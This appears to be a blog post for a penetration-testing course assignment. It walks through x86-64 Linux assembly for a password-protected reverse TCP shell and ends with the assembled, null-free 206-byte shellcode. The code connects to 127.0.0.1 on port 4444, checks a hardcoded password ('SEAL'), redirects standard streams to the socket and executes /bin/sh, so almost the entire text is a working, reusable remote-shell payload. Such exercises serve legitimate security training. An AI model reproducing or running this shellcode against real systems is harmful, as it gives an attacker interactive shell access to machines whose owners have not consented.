ASSIGNEMENT #2

Laisser un commentaire

Shell Reverse TCP

Requirements:
*Reverse connect to a configured IP and port
*Needs a password
*If password correct execs a shell
*Remove 0x00

Repository:https://github.com/Farad77/pentestAssign2.git
So for this second assignement, the idea was to put an authentification system to areverse tcp shell.
The binary is trying to connect to a port and then wait for the password to give shell.

Socket initialisation

        xor rax,rax
	add al,41
	xor rsi,rsi
	add sil,1
	xor rdi,rdi
	add dil,2
	xor rdx,rdx

	syscall ;socket create

	mov rdi,rax ;socket stocked

	xor rax,rax
	push rax

;pour le connect il nous faut plusieurs données
;struct_addr: 8byte de ip addr (127.0.0.1) (7f.0.0.1)
;l'adresse du serveur: ANY (0)
;le port codé en big endian (hton converti en hex)
;Le AF_INET=2
	xor rax,rax
	mov byte [rsp-01],0x01
	mov byte  [rsp-02],al
	mov byte [rsp-03],al
	mov byte [rsp-4],0x7f
	mov word [rsp-6],0x5c11 ;5c11=23569(BE)=4444(LE)
	inc rax
	inc rax
	mov word [rsp-8],ax
	sub rsp,8

;connect= syscall 42
	xor rax,rax
	add al,42
	mov rsi,rsp
	xor rdx,rdx
	add dl,16
	syscall  ;port ouvert

jmp waitPassword

We connect to 127.0.0.1 on port 4444 and go to waitPassword

;;;;;;;;;;;;;;;;;;;;;;;;;;;jmpcallpop from waitforPassword (buffer for password)
getBufferAddr:
	pop rsi
	;read 5bytes
	xor rax,rax
	xor rdx,rdx
	add dl,5
	syscall

	cmp dword [rsi],0x4c414553 ;compare it with SEAL
	je auth_ok

	xor rax, rax
	add rax, 60
	xor rdi, rdi
	syscall	

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
waitPassword:
	call getBufferAddr
	pass db "AAAAB"

Password is 5 bytes so we read it from the socket and compare it with our hardcoded password « SEAL »
If auth is not ok we exit, if password matches we launch a shell (bin/sh)

auth_ok:
;dup2 0
	xor rax,rax	
	add al,33 ;dup2
	xor rsi,rsi
	syscall
;dup2 1
	xor rax,rax
	add al,33
	xor rsi,rsi
	add sil,1
	syscall

;dup2 2
	xor rax,rax
	add al,33
	xor rsi,rsi
	add sil,2
	syscall
	jmp short exec
...
exec:
	; First NULL push

	xor rax, rax
	push rax

	; push /bin//sh in reverse 

	mov rbx, 0x68732f2f6e69622f
	push rbx

	; store /bin//sh address in RDI

	mov rdi, rsp

	; Second NULL push 
	push rax

	; set RDX
	mov rdx, rsp 


	; Push address of /bin//sh
	push rdi

	; set RSI

	mov rsi, rsp

	; Call the Execve syscall 
	add rax, 59
	syscall

ShellCode in byte is « \x48\x31\xc0\x04\x29\x48\x31\xf6\x40\x80\xc6\x01\x48\x31\xff\x40\x80\xc7\x02\x48\x31\xd2\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\x48\x31\xc0\xc6\x44\x24\xff\x01\x88\x44\x24\xfe\x88\x44\x24\xfd\xc6\x44\x24\xfc\x7f\x66\xc7\x44\x24\xfa\x11\x5c\x48\xff\xc0\x48\xff\xc0\x66\x89\x44\x24\xf8\x48\x83\xec\x08\x48\x31\xc0\x04\x2a\x48\x89\xe6\x48\x31\xd2\x80\xc2\x10\x0f\x05\xeb\x48\x48\x31\xc0\x04\x21\x48\x31\xf6\x0f\x05\x48\x31\xc0\x04\x21\x48\x31\xf6\x40\x80\xc6\x01\x0f\x05\x48\x31\xc0\x04\x21\x48\x31\xf6\x40\x80\xc6\x02\x0f\x05\xeb\x2a\x5e\x48\x31\xc0\x48\x31\xd2\x80\xc2\x05\x0f\x05\x81\x3e\x53\x45\x41\x4c\x74\xc4\x48\x31\xc0\x48\x83\xc0\x3c\x48\x31\xff\x0f\x05\xe8\xdb\xff\xff\xff\x41\x41\x41\x41\x42\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05 »

No Null byte and 206 bytes long.

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *